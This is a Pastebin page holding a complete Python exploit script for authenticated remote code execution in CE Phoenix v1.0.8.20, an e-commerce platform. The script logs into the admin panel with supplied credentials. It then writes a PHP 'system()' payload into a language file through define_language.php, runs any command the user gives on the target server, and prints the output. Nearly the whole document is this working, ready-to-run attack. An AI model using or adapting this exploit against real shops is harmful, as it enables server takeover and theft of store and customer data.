Advertisement
FlyFar

CE Phoenix v1.0.8.20 - Remote Code Execution

Apr 7th, 2024
712
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.58 KB | Cybersecurity | 0 0
  1. ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
  2. #### Date: 2023-11-25
  3. #### Exploit Author: tmrswrr
  4. #### Category: Webapps
  5. #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
  6. #### Version: v1.0.8.20
  7. #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)
  8.  
  9. ## EXPLOIT :
  10.  
  11. import requests
  12. from bs4 import BeautifulSoup
  13. import sys
  14. import urllib.parse
  15. import random
  16. from time import sleep
  17.  
  18. class colors:
  19.     OKBLUE = '\033[94m'
  20.     WARNING = '\033[93m'
  21.     FAIL = '\033[91m'
  22.     ENDC = '\033[0m'
  23.     BOLD = '\033[1m'
  24.     UNDERLINE = '\033[4m'
  25.     CBLACK = '\33[30m'
  26.     CRED = '\33[31m'
  27.     CGREEN = '\33[32m'
  28.     CYELLOW = '\33[33m'
  29.     CBLUE = '\33[34m'
  30.     CVIOLET = '\33[35m'
  31.     CBEIGE = '\33[36m'
  32.     CWHITE = '\33[37m'
  33.  
  34.  
  35. def entry_banner():
  36.     color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
  37.                     colors.CRED, colors.CBEIGE]
  38.     random.shuffle(color_random)
  39.  
  40.     banner = color_random[0] + """
  41.     CE Phoenix v1.0.8.20 - Remote Code Execution \n
  42.     Author: tmrswrr
  43.    """
  44.     for char in banner:
  45.         print(char, end='')
  46.         sys.stdout.flush()
  47.         sleep(0.0045)
  48.  
  49. def get_formid_and_cookies(session, url):
  50.     response = session.get(url, allow_redirects=True)
  51.     if response.ok:
  52.         soup = BeautifulSoup(response.text, 'html.parser')
  53.         formid_input = soup.find('input', {'name': 'formid'})
  54.         if formid_input:
  55.             return formid_input['value'], session.cookies
  56.     return None, None
  57.  
  58. def perform_exploit(session, url, username, password, command):
  59.     print("\n[+] Attempting to exploit the target...")
  60.  
  61.    
  62.     initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
  63.     formid, cookies = get_formid_and_cookies(session, initial_url)
  64.     if not formid:
  65.         print("[-] Failed to retrieve initial formid.")
  66.         return
  67.  
  68.     # Login
  69.     print("[+] Performing login...")
  70.     login_payload = {
  71.         'formid': formid,
  72.         'username': username,
  73.         'password': password
  74.     }
  75.     login_headers = {
  76.         'Content-Type': 'application/x-www-form-urlencoded',
  77.         'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
  78.         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
  79.         'Referer': initial_url
  80.     }
  81.     login_url = url + "/admin/login.php?action=process"
  82.     login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)
  83.  
  84.     if not login_response.ok:
  85.         print("[-] Login failed.")
  86.         print(login_response.text)
  87.         return
  88.  
  89.     print("[+] Login successful.")
  90.  
  91.  
  92.     new_formid, _ = get_formid_and_cookies(session, login_response.url)
  93.     if not new_formid:
  94.         print("[-] Failed to retrieve new formid after login.")
  95.         return
  96.  
  97.     # Exploit
  98.     print("[+] Executing the exploit...")
  99.     encoded_command = urllib.parse.quote_plus(command)
  100.     exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
  101.     exploit_headers = {
  102.         'Content-Type': 'application/x-www-form-urlencoded',
  103.         'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
  104.         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
  105.         'Referer': login_response.url
  106.     }
  107.     exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
  108.     exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)
  109.  
  110.     if exploit_response.ok:
  111.         print("[+] Exploit executed successfully.")
  112.     else:
  113.         print("[-] Exploit failed.")
  114.         print(exploit_response.text)
  115.  
  116.    
  117.     final_response = session.get(url)
  118.     print("\n[+] Executed Command Output:\n")
  119.     print(final_response.text)  
  120.  
  121. def main(base_url, username, password, command):
  122.     print("\n[+] Starting the exploitation process...")
  123.     session = requests.Session()
  124.     perform_exploit(session, base_url, username, password, command)
  125.  
  126. if __name__ == "__main__":
  127.     entry_banner()
  128.  
  129.     if len(sys.argv) < 5:
  130.         print("Usage: python script.py [URL] [username] [password] [command]")
  131.         sys.exit(1)
  132.  
  133.     base_url = sys.argv[1]
  134.     username = sys.argv[2]
  135.     password = sys.argv[3]
  136.     command = sys.argv[4]
  137.  
  138.     main(base_url, username, password, command)
  139.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement